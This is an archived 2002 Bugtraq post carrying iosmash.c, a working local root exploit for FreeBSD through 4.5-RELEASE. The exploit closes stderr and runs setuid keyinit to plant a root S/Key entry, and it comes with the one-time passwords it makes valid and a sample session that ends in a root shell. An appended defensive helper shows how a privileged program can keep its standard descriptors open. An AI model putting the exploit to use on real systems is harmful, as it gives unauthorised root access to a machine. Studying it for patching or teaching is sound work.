[25222] in bugtraq
cheers
daemon@ATHENA.MIT.EDU (KF)
Tue Apr 23 13:45:52 2002
Message-ID: <3CC4FE08.9060902@snosoft.com>
Date: Mon, 22 Apr 2002 23:24:08 -0700
From: KF <dotslash@snosoft.com>
MIME-Version: 1.0
To: bugtraq <bugtraq@securityfocus.org>,
vuln-dev <vuln-dev@security-focus.com>
Content-Type: multipart/mixed;
boundary="------------010008030401040105050200"
--------------010008030401040105050200
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
http://www.phased.home.ro/iosmash.c
-KF
--------------010008030401040105050200
Content-Type: text/plain;
name="iosmash.c"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
filename="iosmash.c"
/*
 * phased/b10z
 * phased@snosoft.com
 * 23/04/2002
 *
 * stdio kernel bug in All releases of FreeBSD up to and including 4.5-RELEASE
 * decided to make a trivial exploit to easily get root :)
 *
 *   > id
 *   uid=1003(phased) gid=999(phased) groups=999(phased)
 *   > ./iosmash
 *   Adding phased:
 *   <--- HIT CTRL-C --->
 *   > su
 *   s/key 98 snosoft2
 *   Password:MASS OAT ROLL TOOL AGO CAM
 *   xes#
 *
 * this program makes the following skeys valid
 *
 *   95: CARE LIVE CARD LOFT CHIC HILL
 *   96: TESS OIL WELD DUD MUTE KIT
 *   97: DADE BED DRY JAW GRAB NOV
 *   98: MASS OAT ROLL TOOL AGO CAM
 *   99: DARK LEW JOLT JIVE MOS WHO
 *
 * http://www.snosoft.com
 * cheers Joost Pol
 */
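#include <stdio.h>
#include <unistd.h>

int main(int argc, char *argv[]) {
    /* Duplicate stdout until dup() fails, i.e. the descriptor table is full. */
    while (dup(1) != -1);
    /* Close stderr, leaving descriptor 2 as the only free slot. */
    close(2);
    /* Run keyinit; the string is passed as argv[0] and has the form of an
       s/key entry for root (compare the "s/key 98 snosoft2" challenge above). */
    execl("/usr/bin/keyinit",
          "\nroot 0099 snosoft2 6f648e8bd0e2988a Apr 23,2666 01:02:03\n");
}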
--------------010008030401040105050200--
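
The attachment above starts /usr/bin/keyinit with descriptor 2 closed. As an added example (not part of the original post and not FreeBSD's own code), this is a start-up check a privileged program can make so that descriptors 0, 1 and 2 are always open before it opens any file; the helper name ensure_std_fds is hypothetical, and POSIX fcntl()/open() and a usable /dev/null are assumed.

```c
#include <errno.h>
#include <fcntl.h>
#include <unistd.h>

/*
 * ensure_std_fds() is a hypothetical helper (added example, not FreeBSD code).
 * Call it first thing in main() of a privileged program.
 *
 * Returns how many of descriptors 0..2 were found closed and re-pointed at
 * /dev/null, or -1 if the descriptor table could not be made safe.
 */
int ensure_std_fds(void)
{
    int repaired = 0;

    for (int fd = 0; fd <= 2; fd++) {
        if (fcntl(fd, F_GETFD) != -1)
            continue;                 /* descriptor is open, nothing to do */
        if (errno != EBADF)
            return -1;                /* unexpected failure: do not guess */

        /*
         * open() returns the lowest free descriptor. Descriptors below fd
         * are known to be open at this point, so the result must be fd,
         * even when every descriptor above 2 is already in use.
         */
        int nfd = open("/dev/null", O_RDWR);
        if (nfd == -1)
            return -1;
        if (nfd != fd) {
            close(nfd);
            return -1;
        }
        repaired++;
    }
    return repaired;
}

int main(void)
{
    /* Refuse to continue if 0..2 cannot be guaranteed open. */
    if (ensure_std_fds() == -1)
        _exit(1);
    /* From here on, a file opened by the program can never land on
       descriptor 0, 1 or 2, so stray stderr output cannot reach it. */
    return 0;
}
```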